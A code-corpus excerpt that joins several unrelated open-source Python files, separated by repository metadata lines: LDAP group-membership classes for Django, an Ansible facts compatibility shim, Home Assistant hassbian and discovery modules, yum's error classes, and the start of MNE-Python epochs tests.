for search, msgid in zip(self.searches, msgids):
if msgid is not None:
result = search._results(connection, msgid)
results.update(dict(result))
return results.items()
class _DeepStringCoder(object):
"""
Encodes and decodes strings in a nested structure of lists, tuples, and
dicts. This is helpful when interacting with the Unicode-unaware
python-ldap.
"""
def __init__(self, encoding):
self.encoding = encoding
self.ldap = _LDAPConfig.get_ldap()
def decode(self, value):
try:
if isinstance(value, bytes):
value = value.decode(self.encoding)
elif isinstance(value, list):
value = self._decode_list(value)
elif isinstance(value, tuple):
value = tuple(self._decode_list(value))
elif isinstance(value, dict):
value = self._decode_dict(value)
except UnicodeDecodeError:
pass
return value
def _decode_list(self, value):
return [self.decode(v) for v in value]
def _decode_dict(self, value):
# Attribute dictionaries should be case-insensitive. python-ldap
# defines this, although for some reason, it doesn't appear to use it
# for search results.
decoded = self.ldap.cidict.cidict()
for k, v in value.items():
decoded[self.decode(k)] = self.decode(v)
return decoded
class LDAPGroupType(object):
"""
This is an abstract base class for classes that determine LDAP group
membership. A group can mean many different things in LDAP, so we will need
a concrete subclass for each grouping mechanism. Clients may subclass this
if they have a group mechanism that is not handled by a built-in
implementation.
name_attr is the name of the LDAP attribute from which we will take the
Django group name.
Subclasses in this file must use self.ldap to access the python-ldap module.
This will be a mock object during unit tests.
"""
def __init__(self, name_attr="cn"):
self.name_attr = name_attr
self.ldap = _LDAPConfig.get_ldap()
def user_groups(self, ldap_user, group_search):
"""
Returns a list of group_info structures, each one a group to which
ldap_user belongs. group_search is an LDAPSearch object that returns all
of the groups that the user might belong to. Typical implementations
will apply additional filters to group_search and return the results of
the search. ldap_user represents the user and has the following three
properties:
dn: the distinguished name
attrs: a dictionary of LDAP attributes (with lists of values)
connection: an LDAPObject that has been bound with credentials
This is the primitive method in the API and must be implemented.
"""
return []
def is_member(self, ldap_user, group_dn):
"""
This method is an optimization for determining group membership without
loading all of the user's groups. Subclasses that are able to do this
may return True or False. ldap_user is as above. group_dn is the
distinguished name of the group in question.
The base implementation returns None, which means we don't have enough
information. The caller will have to call user_groups() instead and look
for group_dn in the results.
"""
return None
def group_name_from_info(self, group_info):
"""
Given the (DN, attrs) 2-tuple of an LDAP group, this returns the name of
the Django group. This may return None to indicate that a particular
LDAP group has no corresponding Django group.
The base implementation returns the value of the cn attribute, or
whichever attribute was given to __init__ in the name_attr
parameter.
"""
try:
name = group_info[1][self.name_attr][0]
except (KeyError, IndexError):
name = None
return name
class PosixGroupType(LDAPGroupType):
"""
An LDAPGroupType subclass that handles groups of class posixGroup.
"""
def user_groups(self, ldap_user, group_search):
"""
Searches for any group that is either the user's primary or contains the
user as a member.
"""
groups = []
try:
user_uid = ldap_user.attrs['uid'][0]
if 'gidNumber' in ldap_user.attrs:
user_gid = ldap_user.attrs['gidNumber'][0]
filterstr = u'(|(gidNumber=%s)(memberUid=%s))' % (
self.ldap.filter.escape_filter_chars(user_gid),
self.ldap.filter.escape_filter_chars(user_uid)
)
else:
filterstr = u'(memberUid=%s)' % (
self.ldap.filter.escape_filter_chars(user_uid),
)
search = group_search.search_with_additional_term_string(filterstr)
groups = search.execute(ldap_user.connection)
except (KeyError, IndexError):
pass
return groups
def is_member(self, ldap_user, group_dn):
"""
Returns True if the group is the user's primary group or if the user is
listed in the group's memberUid attribute.
"""
try:
user_uid = ldap_user.attrs['uid'][0]
try:
is_member = ldap_user.connection.compare_s(force_str(group_dn), 'memberUid', force_str(user_uid))
except (ldap.UNDEFINED_TYPE, ldap.NO_SUCH_ATTRIBUTE):
is_member = False
if not is_member:
try:
user_gid = ldap_user.attrs['gidNumber'][0]
is_member = ldap_user.connection.compare_s(force_str(group_dn), 'gidNumber', force_str(user_gid))
except (ldap.UNDEFINED_TYPE, ldap.NO_SUCH_ATTRIBUTE):
is_member = False
except (KeyError, IndexError):
is_member = False
return is_member
class MemberDNGroupType(LDAPGroupType):
"""
A group type that stores lists of members as distinguished names.
"""
def __init__(self, member_attr, name_attr='cn'):
"""
member_attr is the attribute on the group object that holds the list of
member DNs.
"""
self.member_attr = member_attr
super(MemberDNGroupType, self).__init__(name_attr)
def user_groups(self, ldap_user, group_search):
search = group_search.search_with_additional_terms({self.member_attr: ldap_user.dn})
groups = search.execute(ldap_user.connection)
return groups
def is_member(self, ldap_user, group_dn):
try:
result = ldap_user.connection.compare_s(
force_str(group_dn),
force_str(self.member_attr),
force_str(ldap_user.dn)
)
except (ldap.UNDEFINED_TYPE, ldap.NO_SUCH_ATTRIBUTE):
result = 0
return result
class NISGroupType(LDAPGroupType):
"""
A group type that handles nisNetgroup.
"""
def user_groups(self, ldap_user, group_search):
try:
user_uid = ldap_user.attrs['uid'][0]
filterstr = u'(|(nisNetgroupTriple=%s)(nisNetgroupTriple=%s))' % (
self.ldap.filter.escape_filter_chars('(,%s,)' % user_uid),
self.ldap.filter.escape_filter_chars('(-,%s,-)' % user_uid)
)
search = group_search.search_with_additional_term_string(filterstr)
groups = search.execute(ldap_user.connection)
except (KeyError, IndexError):
pass
return groups
def is_member(self, ldap_user, group_dn):
try:
user_uid = ldap_user.attrs['uid'][0]
result = ldap_user.connection.compare_s(
force_str(group_dn),
force_str('nisNetgroupTriple'),
force_str('(,%s,)' % (user_uid))
)
if result == 0:
result = ldap_user.connection.compare_s(
force_str(group_dn),
force_str('nisNetgroupTriple'),
force_str('(-,%s,-)' % (user_uid))
)
except (ldap.UNDEFINED_TYPE, ldap.NO_SUCH_ATTRIBUTE, KeyError, IndexError):
result = 0
return result
class NestedMemberDNGroupType(LDAPGroupType):
"""
A group type that stores lists of members as distinguished names and
supports nested groups. There is no shortcut for is_member in this case, so
it's left unimplemented.
"""
def __init__(self, member_attr, name_attr='cn'):
"""
member_attr is the attribute on the group object that holds the list of
member DNs.
"""
self.member_attr = member_attr
super(NestedMemberDNGroupType, self).__init__(name_attr)
def user_groups(self, ldap_user, group_search):
"""
This searches for all of a user's groups from the bottom up. In other
words, it returns the groups that the user belongs to, the groups that
those groups belong to, etc. Circular references will be detected and
pruned.
"""
group_info_map = {} # Maps group_dn to group_info of groups we've found
member_dn_set = set([ldap_user.dn]) # Member DNs to search with next
handled_dn_set = set() # Member DNs that we've already searched with
while len(member_dn_set) > 0:
group_infos = self.find_groups_with_any_member(member_dn_set,
group_search,
ldap_user.connection)
new_group_info_map = dict([(info[0], info) for info in group_infos])
group_info_map.update(new_group_info_map)
handled_dn_set.update(member_dn_set)
# Get ready for the next iteration. To avoid cycles, we make sure
# never to search with the same member DN twice.
member_dn_set = set(new_group_info_map.keys()) - handled_dn_set
return group_info_map.values()
def find_groups_with_any_member(self, member_dn_set, group_search, connection):
terms = [
u"(%s=%s)" % (self.member_attr, self.ldap.filter.escape_filter_chars(dn))
for dn in member_dn_set
]
filterstr = u"(|%s)" % "".join(terms)
search = group_search.search_with_additional_term_string(filterstr)
return search.execute(connection)
class GroupOfNamesType(MemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class groupOfNames.
"""
def __init__(self, name_attr='cn'):
super(GroupOfNamesType, self).__init__('member', name_attr)
class NestedGroupOfNamesType(NestedMemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class groupOfNames with
nested group references.
"""
def __init__(self, name_attr='cn'):
super(NestedGroupOfNamesType, self).__init__('member', name_attr)
class GroupOfUniqueNamesType(MemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class groupOfUniqueNames.
"""
def __init__(self, name_attr='cn'):
super(GroupOfUniqueNamesType, self).__init__('uniqueMember', name_attr)
class NestedGroupOfUniqueNamesType(NestedMemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class groupOfUniqueNames
with nested group references.
"""
def __init__(self, name_attr='cn'):
super(NestedGroupOfUniqueNamesType, self).__init__('uniqueMember', name_attr)
class ActiveDirectoryGroupType(MemberDNGroupType):
"""
An LDAPGroupType subclass that handles Active Directory groups.
"""
def __init__(self, name_attr='cn'):
super(ActiveDirectoryGroupType, self).__init__('member', name_attr)
class NestedActiveDirectoryGroupType(NestedMemberDNGroupType):
"""
An LDAPGroupType subclass that handles Active Directory groups with nested
group references.
"""
def __init__(self, name_attr='cn'):
super(NestedActiveDirectoryGroupType, self).__init__('member', name_attr)
class OrganizationalRoleGroupType(MemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class organizationalRole.
"""
def __init__(self, name_attr='cn'):
super(OrganizationalRoleGroupType, self).__init__('roleOccupant', name_attr)
class NestedOrganizationalRoleGroupType(NestedMemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class OrganizationalRoleGroupType
with nested group references.
"""
def __init__(self, name_attr='cn'):
super(NestedOrganizationalRoleGroupType, self).__init__('roleOccupant', name_attr)
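# Typical settings-level pairing of a group search with one of the group types
# above (illustrative placeholders):
#
#     AUTH_LDAP_GROUP_SEARCH = LDAPSearch("ou=groups,dc=example,dc=com",
#                                         ldap.SCOPE_SUBTREE,
#                                         "(objectClass=groupOfNames)")
#     AUTH_LDAP_GROUP_TYPE = GroupOfNamesType(name_attr="cn")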
| bsd-2-clause | 4,442,355,700,673,920,000 | 35.388535 | 117 | 0.616051 | false |
wrouesnel/ansible | lib/ansible/module_utils/facts/compat.py | 23 | 4115 | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2017 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.namespace import PrefixFactNamespace
from ansible.module_utils.facts import default_collectors
from ansible.module_utils.facts import ansible_collector
def get_all_facts(module):
'''compat api for ansible 2.2/2.3 module_utils.facts.get_all_facts method
Expects module to be an instance of AnsibleModule, with a 'gather_subset' param.
returns a dict mapping the bare fact name ('default_ipv4' with no 'ansible_' namespace) to
the fact value.'''
gather_subset = module.params['gather_subset']
return ansible_facts(module, gather_subset=gather_subset)
def ansible_facts(module, gather_subset=None):
'''Compat api for ansible 2.0/2.2/2.3 module_utils.facts.ansible_facts method
    2.2/2.3 expects a gather_subset arg.
    2.0/2.1 does not accept a gather_subset arg.
    So make gather_subset an optional arg, defaulting to the module's 'gather_subset' param (or ['all'])
'module' should be an instance of an AnsibleModule.
returns a dict mapping the bare fact name ('default_ipv4' with no 'ansible_' namespace) to
the fact value.
'''
gather_subset = gather_subset or module.params.get('gather_subset', ['all'])
gather_timeout = module.params.get('gather_timeout', 10)
filter_spec = module.params.get('filter', '*')
minimal_gather_subset = frozenset(['apparmor', 'caps', 'cmdline', 'date_time',
'distribution', 'dns', 'env', 'fips', 'local', 'lsb',
'pkg_mgr', 'platform', 'python', 'selinux',
'service_mgr', 'ssh_pub_keys', 'user'])
all_collector_classes = default_collectors.collectors
# don't add a prefix
namespace = PrefixFactNamespace(namespace_name='ansible', prefix='')
fact_collector = \
ansible_collector.get_ansible_collector(all_collector_classes=all_collector_classes,
namespace=namespace,
filter_spec=filter_spec,
gather_subset=gather_subset,
gather_timeout=gather_timeout,
minimal_gather_subset=minimal_gather_subset)
facts_dict = fact_collector.collect(module=module)
return facts_dict
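# Illustrative call site (assumes ``module`` is an existing AnsibleModule with
# the usual fact-gathering params; not part of this compat shim):
#
#     facts = ansible_facts(module, gather_subset=['all'])
#     module.exit_json(ansible_facts=facts)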
| gpl-3.0 | -4,557,754,301,573,688,000 | 46.298851 | 94 | 0.681896 | false |
miniconfig/home-assistant | homeassistant/components/config/hassbian.py | 9 | 2472 | """Component to interact with Hassbian tools."""
import asyncio
import json
import os
from homeassistant.components.http import HomeAssistantView
_TEST_OUTPUT = """
{
"suites":{
"libcec":{
"state":"Uninstalled",
"description":"Installs the libcec package for controlling CEC devices from this Pi"
},
"mosquitto":{
"state":"failed",
"description":"Installs the Mosquitto package for setting up a local MQTT server"
},
"openzwave":{
"state":"Uninstalled",
"description":"Installs the Open Z-wave package for setting up your zwave network"
},
"samba":{
"state":"installing",
"description":"Installs the samba package for sharing the hassbian configuration files over the Pi's network."
}
}
}
""" # noqa
@asyncio.coroutine
def async_setup(hass):
"""Setup the hassbian config."""
# Test if is hassbian
test_mode = 'FORCE_HASSBIAN' in os.environ
is_hassbian = test_mode
if not is_hassbian:
return False
hass.http.register_view(HassbianSuitesView(test_mode))
hass.http.register_view(HassbianSuiteInstallView(test_mode))
return True
@asyncio.coroutine
def hassbian_status(hass, test_mode=False):
"""Query for the Hassbian status."""
# fetch real output when not in test mode
if test_mode:
return json.loads(_TEST_OUTPUT)
raise Exception('Real mode not implemented yet.')
class HassbianSuitesView(HomeAssistantView):
"""Hassbian packages endpoint."""
url = '/api/config/hassbian/suites'
name = 'api:config:hassbian:suites'
def __init__(self, test_mode):
"""Initialize suites view."""
self._test_mode = test_mode
@asyncio.coroutine
def get(self, request):
"""Request suite status."""
inp = yield from hassbian_status(request.app['hass'], self._test_mode)
return self.json(inp['suites'])
class HassbianSuiteInstallView(HomeAssistantView):
"""Hassbian packages endpoint."""
url = '/api/config/hassbian/suites/{suite}/install'
name = 'api:config:hassbian:suite'
def __init__(self, test_mode):
"""Initialize suite view."""
self._test_mode = test_mode
@asyncio.coroutine
def post(self, request, suite):
"""Request suite status."""
# do real install if not in test mode
return self.json({"status": "ok"})
| mit | 2,375,142,109,037,028,000 | 26.164835 | 122 | 0.62945 | false |
pnasrat/yum | yum/Errors.py | 1 | 4097 | #!/usr/bin/python -tt
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Copyright 2004 Duke University
"""
Exceptions and Errors thrown by yum.
"""
from i18n import to_unicode, to_utf8
class YumBaseError(Exception):
"""
Base Yum Error. All other Errors thrown by yum should inherit from
this.
"""
def __init__(self, value=None):
Exception.__init__(self)
self.value = value
def __str__(self):
return "%s" % to_utf8(self.value)
def __unicode__(self):
return '%s' % to_unicode(self.value)
class YumGPGCheckError(YumBaseError):
pass
class YumDownloadError(YumBaseError):
pass
class YumTestTransactionError(YumBaseError):
pass
class YumRPMCheckError(YumBaseError):
pass
class YumRPMTransError(YumBaseError):
""" This class means rpm's .ts.run() returned known errors. We are compat.
with YumBaseError in that we print nicely, and compat. with traditional
usage of this error from runTransaction(). """
def __init__(self, msg, errors):
self.msg = msg
self.errors = errors
# old YumBaseError raises from runTransaction used to raise just this
self.value = self.errors
def __str__(self):
return "%s" %(self.msg,)
def __unicode__(self):
return '%s' % to_unicode(self.msg)
class LockError(YumBaseError):
def __init__(self, errno, msg, pid=0):
YumBaseError.__init__(self, msg)
self.errno = errno
self.msg = msg
self.pid = pid
class DepError(YumBaseError):
pass
class RepoError(YumBaseError):
pass
class DuplicateRepoError(RepoError):
pass
# Have our own custom .value with all the mirror errors.
class NoMoreMirrorsRepoError(RepoError):
def __init__(self, value=None, errors=None):
Exception.__init__(self)
self._value = value
self.errors = errors
@property
def value(self):
ret = self._value
for url, msg in self.errors or []:
ret += '\n%s: %s' % (url, msg)
return ret
class ConfigError(YumBaseError):
pass
class MiscError(YumBaseError):
pass
class GroupsError(YumBaseError):
pass
class InstallError(YumBaseError):
pass
class UpdateError(YumBaseError):
pass
class RemoveError(YumBaseError):
pass
class ReinstallError(YumBaseError):
pass
class ReinstallRemoveError(ReinstallError):
pass
class ReinstallInstallError(ReinstallError):
def __init__(self, value=None, failed_pkgs=[]):
ReinstallError.__init__(self, value)
self.failed_pkgs = failed_pkgs
class DowngradeError(YumBaseError):
pass
class RepoMDError(YumBaseError):
pass
class PackageSackError(YumBaseError):
pass
class RpmDBError(YumBaseError):
pass
class CompsException(YumBaseError):
pass
class MediaError(YumBaseError):
pass
class PkgTagsError(YumBaseError):
pass
class YumDeprecationWarning(DeprecationWarning):
"""
Used to mark a method as deprecated.
"""
def __init__(self, value=None):
DeprecationWarning.__init__(self, value)
class YumFutureDeprecationWarning(YumDeprecationWarning):
"""
Used to mark a method as deprecated. Unlike YumDeprecationWarning,
YumFutureDeprecationWarnings will not be shown on the console.
"""
def __init__(self, value=None):
YumDeprecationWarning.__init__(self, value)
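# Illustrative use of the hierarchy above (``some_yum_operation`` is a
# hypothetical caller, not part of this module):
#
#     try:
#         some_yum_operation()
#     except RepoError as e:
#         print("repository problem: %s" % e)
#     except YumBaseError as e:
#         print("yum failure: %s" % e)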
| gpl-2.0 | 8,602,026,957,233,051,000 | 24.767296 | 79 | 0.675372 | false |
postlund/home-assistant | homeassistant/helpers/discovery.py | 2 | 5724 | """Helper methods to help with platform discovery.
There are two different types of discoveries that can be fired/listened for.
- listen/discover is for services. These are targeted at a component.
- listen_platform/discover_platform is for platforms. These are used by
components to allow discovery of their platforms.
"""
from typing import Callable, Collection, Union
from homeassistant import core, setup
from homeassistant.const import ATTR_DISCOVERED, ATTR_SERVICE, EVENT_PLATFORM_DISCOVERED
from homeassistant.exceptions import HomeAssistantError
from homeassistant.loader import DEPENDENCY_BLACKLIST, bind_hass
from homeassistant.util.async_ import run_callback_threadsafe
# mypy: allow-untyped-defs, no-check-untyped-defs
EVENT_LOAD_PLATFORM = "load_platform.{}"
ATTR_PLATFORM = "platform"
@bind_hass
def listen(
hass: core.HomeAssistant, service: Union[str, Collection[str]], callback: Callable
) -> None:
"""Set up listener for discovery of specific service.
Service can be a string or a list/tuple.
"""
run_callback_threadsafe(hass.loop, async_listen, hass, service, callback).result()
@core.callback
@bind_hass
def async_listen(
hass: core.HomeAssistant, service: Union[str, Collection[str]], callback: Callable
) -> None:
"""Set up listener for discovery of specific service.
Service can be a string or a list/tuple.
"""
if isinstance(service, str):
service = (service,)
else:
service = tuple(service)
@core.callback
def discovery_event_listener(event: core.Event) -> None:
"""Listen for discovery events."""
if ATTR_SERVICE in event.data and event.data[ATTR_SERVICE] in service:
hass.async_add_job(
callback, event.data[ATTR_SERVICE], event.data.get(ATTR_DISCOVERED)
)
hass.bus.async_listen(EVENT_PLATFORM_DISCOVERED, discovery_event_listener)
@bind_hass
def discover(hass, service, discovered, component, hass_config):
"""Fire discovery event. Can ensure a component is loaded."""
hass.add_job(async_discover(hass, service, discovered, component, hass_config))
@bind_hass
async def async_discover(hass, service, discovered, component, hass_config):
"""Fire discovery event. Can ensure a component is loaded."""
if component in DEPENDENCY_BLACKLIST:
raise HomeAssistantError(f"Cannot discover the {component} component.")
if component is not None and component not in hass.config.components:
await setup.async_setup_component(hass, component, hass_config)
data = {ATTR_SERVICE: service}
if discovered is not None:
data[ATTR_DISCOVERED] = discovered
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, data)
@bind_hass
def listen_platform(
hass: core.HomeAssistant, component: str, callback: Callable
) -> None:
"""Register a platform loader listener."""
run_callback_threadsafe(
hass.loop, async_listen_platform, hass, component, callback
).result()
@bind_hass
def async_listen_platform(
hass: core.HomeAssistant, component: str, callback: Callable
) -> None:
"""Register a platform loader listener.
This method must be run in the event loop.
"""
service = EVENT_LOAD_PLATFORM.format(component)
@core.callback
def discovery_platform_listener(event: core.Event) -> None:
"""Listen for platform discovery events."""
if event.data.get(ATTR_SERVICE) != service:
return
platform = event.data.get(ATTR_PLATFORM)
if not platform:
return
hass.async_run_job(callback, platform, event.data.get(ATTR_DISCOVERED))
hass.bus.async_listen(EVENT_PLATFORM_DISCOVERED, discovery_platform_listener)
@bind_hass
def load_platform(hass, component, platform, discovered, hass_config):
"""Load a component and platform dynamically.
Target components will be loaded and an EVENT_PLATFORM_DISCOVERED will be
fired to load the platform. The event will contain:
{ ATTR_SERVICE = EVENT_LOAD_PLATFORM + '.' + <<component>>
ATTR_PLATFORM = <<platform>>
ATTR_DISCOVERED = <<discovery info>> }
Use `listen_platform` to register a callback for these events.
"""
hass.add_job(
async_load_platform(hass, component, platform, discovered, hass_config)
)
@bind_hass
async def async_load_platform(hass, component, platform, discovered, hass_config):
"""Load a component and platform dynamically.
Target components will be loaded and an EVENT_PLATFORM_DISCOVERED will be
fired to load the platform. The event will contain:
{ ATTR_SERVICE = EVENT_LOAD_PLATFORM + '.' + <<component>>
ATTR_PLATFORM = <<platform>>
ATTR_DISCOVERED = <<discovery info>> }
Use `listen_platform` to register a callback for these events.
Warning: Do not await this inside a setup method to avoid a dead lock.
Use `hass.async_create_task(async_load_platform(..))` instead.
This method is a coroutine.
"""
assert hass_config, "You need to pass in the real hass config"
if component in DEPENDENCY_BLACKLIST:
raise HomeAssistantError(f"Cannot discover the {component} component.")
setup_success = True
if component not in hass.config.components:
setup_success = await setup.async_setup_component(hass, component, hass_config)
# No need to fire event if we could not set up component
if not setup_success:
return
data = {
ATTR_SERVICE: EVENT_LOAD_PLATFORM.format(component),
ATTR_PLATFORM: platform,
}
if discovered is not None:
data[ATTR_DISCOVERED] = discovered
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, data)
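# --- Illustrative usage sketch (added for clarity; not in the original file).
# Following the warning above: from an async setup of the hypothetical
# "example_component", schedule the platform load rather than awaiting it.
# The component/platform names and discovery payload are illustrative only,
# and this must be called from within the event loop.
def _example_request_platform_load(hass, hass_config) -> None:
    """Sketch: ask HA to load the 'example' sensor platform via discovery."""
    hass.async_create_task(
        async_load_platform(
            hass, "sensor", "example", {"serial_number": "0000"}, hass_config
        )
    )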
| apache-2.0 | 8,365,989,192,857,045,000 | 32.086705 | 88 | 0.698812 | false |
nicproulx/mne-python | mne/tests/test_epochs.py | 2 | 91453 | # Author: Alexandre Gramfort <[email protected]>
# Denis Engemann <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
from copy import deepcopy
from nose.tools import (assert_true, assert_equal, assert_raises,
assert_not_equal)
from numpy.testing import (assert_array_equal, assert_array_almost_equal,
assert_allclose)
import numpy as np
import copy as cp
import warnings
from scipy import fftpack
import matplotlib
from mne import (Epochs, Annotations, read_events, pick_events, read_epochs,
equalize_channels, pick_types, pick_channels, read_evokeds,
write_evokeds, create_info, make_fixed_length_events,
combine_evoked)
from mne.baseline import rescale
from mne.preprocessing import maxwell_filter
from mne.epochs import (
bootstrap, equalize_epoch_counts, combine_event_ids, add_channels_epochs,
EpochsArray, concatenate_epochs, BaseEpochs, average_movements)
from mne.utils import (_TempDir, requires_pandas, slow_test,
run_tests_if_main, requires_version)
from mne.chpi import read_head_pos, head_pos_to_trans_rot_t
from mne.io import RawArray, read_raw_fif
from mne.io.proj import _has_eeg_average_ref_proj
from mne.event import merge_events
from mne.io.constants import FIFF
from mne.externals.six import text_type
from mne.externals.six.moves import zip, cPickle as pickle
from mne.datasets import testing
from mne.tests.common import assert_meg_snr, assert_naming
matplotlib.use('Agg') # for testing don't use X server
warnings.simplefilter('always') # enable b/c these tests throw warnings
data_path = testing.data_path(download=False)
fname_raw_move = op.join(data_path, 'SSS', 'test_move_anon_raw.fif')
fname_raw_movecomp_sss = op.join(
data_path, 'SSS', 'test_move_anon_movecomp_raw_sss.fif')
fname_raw_move_pos = op.join(data_path, 'SSS', 'test_move_anon_raw.pos')
base_dir = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data')
raw_fname = op.join(base_dir, 'test_raw.fif')
event_name = op.join(base_dir, 'test-eve.fif')
evoked_nf_name = op.join(base_dir, 'test-nf-ave.fif')
event_id, tmin, tmax = 1, -0.2, 0.5
event_id_2 = np.int64(2) # to test non Python int types
rng = np.random.RandomState(42)
def _get_data(preload=False):
"""Get data."""
raw = read_raw_fif(raw_fname, preload=preload)
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, eeg=True, stim=True,
ecg=True, eog=True, include=['STI 014'],
exclude='bads')
return raw, events, picks
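# Peak-to-peak rejection thresholds used throughout these tests: ``reject``
# gives the maximum acceptable peak-to-peak amplitude per channel type
# (grad in T/m, mag in T, eeg/eog in V) and ``flat`` the minimum, so epochs
# exceeding ``reject`` or staying below ``flat`` on any channel are dropped.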
reject = dict(grad=1000e-12, mag=4e-12, eeg=80e-6, eog=150e-6)
flat = dict(grad=1e-15, mag=1e-15)
def test_hierarchical():
"""Test hierarchical access."""
raw, events, picks = _get_data()
event_id = {'a/1': 1, 'a/2': 2, 'b/1': 3, 'b/2': 4}
epochs = Epochs(raw, events, event_id, preload=True)
epochs_a1 = epochs['a/1']
epochs_a2 = epochs['a/2']
epochs_b1 = epochs['b/1']
epochs_b2 = epochs['b/2']
epochs_a = epochs['a']
assert_equal(len(epochs_a), len(epochs_a1) + len(epochs_a2))
epochs_b = epochs['b']
assert_equal(len(epochs_b), len(epochs_b1) + len(epochs_b2))
epochs_1 = epochs['1']
assert_equal(len(epochs_1), len(epochs_a1) + len(epochs_b1))
epochs_2 = epochs['2']
assert_equal(len(epochs_2), len(epochs_a2) + len(epochs_b2))
epochs_all = epochs[('1', '2')]
assert_equal(len(epochs), len(epochs_all))
assert_array_equal(epochs.get_data(), epochs_all.get_data())
@slow_test
@testing.requires_testing_data
def test_average_movements():
"""Test movement averaging algorithm."""
# usable data
crop = 0., 10.
origin = (0., 0., 0.04)
raw = read_raw_fif(fname_raw_move, allow_maxshield='yes')
raw.info['bads'] += ['MEG2443'] # mark some bad MEG channel
raw.crop(*crop).load_data()
raw.filter(None, 20)
events = make_fixed_length_events(raw, event_id)
picks = pick_types(raw.info, meg=True, eeg=True, stim=True,
ecg=True, eog=True, exclude=())
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks, proj=False,
preload=True)
epochs_proj = Epochs(raw, events[:1], event_id, tmin, tmax, picks=picks,
proj=True, preload=True)
raw_sss_stat = maxwell_filter(raw, origin=origin, regularize=None,
bad_condition='ignore')
del raw
epochs_sss_stat = Epochs(raw_sss_stat, events, event_id, tmin, tmax,
picks=picks, proj=False)
evoked_sss_stat = epochs_sss_stat.average()
del raw_sss_stat, epochs_sss_stat
head_pos = read_head_pos(fname_raw_move_pos)
trans = epochs.info['dev_head_t']['trans']
head_pos_stat = (np.array([trans[:3, 3]]),
np.array([trans[:3, :3]]),
np.array([0.]))
# SSS-based
assert_raises(TypeError, average_movements, epochs, None)
evoked_move_non = average_movements(epochs, head_pos=head_pos,
weight_all=False, origin=origin)
evoked_move_all = average_movements(epochs, head_pos=head_pos,
weight_all=True, origin=origin)
evoked_stat_all = average_movements(epochs, head_pos=head_pos_stat,
weight_all=True, origin=origin)
evoked_std = epochs.average()
for ev in (evoked_move_non, evoked_move_all, evoked_stat_all):
assert_equal(ev.nave, evoked_std.nave)
assert_equal(len(ev.info['bads']), 0)
# substantial changes to MEG data
for ev in (evoked_move_non, evoked_stat_all):
assert_meg_snr(ev, evoked_std, 0., 0.1)
assert_raises(AssertionError, assert_meg_snr,
ev, evoked_std, 1., 1.)
meg_picks = pick_types(evoked_std.info, meg=True, exclude=())
assert_allclose(evoked_move_non.data[meg_picks],
evoked_move_all.data[meg_picks], atol=1e-20)
# compare to averaged movecomp version (should be fairly similar)
raw_sss = read_raw_fif(fname_raw_movecomp_sss)
raw_sss.crop(*crop).load_data()
raw_sss.filter(None, 20)
picks_sss = pick_types(raw_sss.info, meg=True, eeg=True, stim=True,
ecg=True, eog=True, exclude=())
assert_array_equal(picks, picks_sss)
epochs_sss = Epochs(raw_sss, events, event_id, tmin, tmax,
picks=picks_sss, proj=False)
evoked_sss = epochs_sss.average()
assert_equal(evoked_std.nave, evoked_sss.nave)
# this should break the non-MEG channels
assert_raises(AssertionError, assert_meg_snr,
evoked_sss, evoked_move_all, 0., 0.)
assert_meg_snr(evoked_sss, evoked_move_non, 0.02, 2.6)
assert_meg_snr(evoked_sss, evoked_stat_all, 0.05, 3.2)
# these should be close to numerical precision
assert_allclose(evoked_sss_stat.data, evoked_stat_all.data, atol=1e-20)
# pos[0] > epochs.events[0] uses dev_head_t, so make it equivalent
destination = deepcopy(epochs.info['dev_head_t'])
x = head_pos_to_trans_rot_t(head_pos[1])
epochs.info['dev_head_t']['trans'][:3, :3] = x[1]
epochs.info['dev_head_t']['trans'][:3, 3] = x[0]
assert_raises(AssertionError, assert_allclose,
epochs.info['dev_head_t']['trans'],
destination['trans'])
evoked_miss = average_movements(epochs, head_pos=head_pos[2:],
origin=origin, destination=destination)
assert_allclose(evoked_miss.data, evoked_move_all.data,
atol=1e-20)
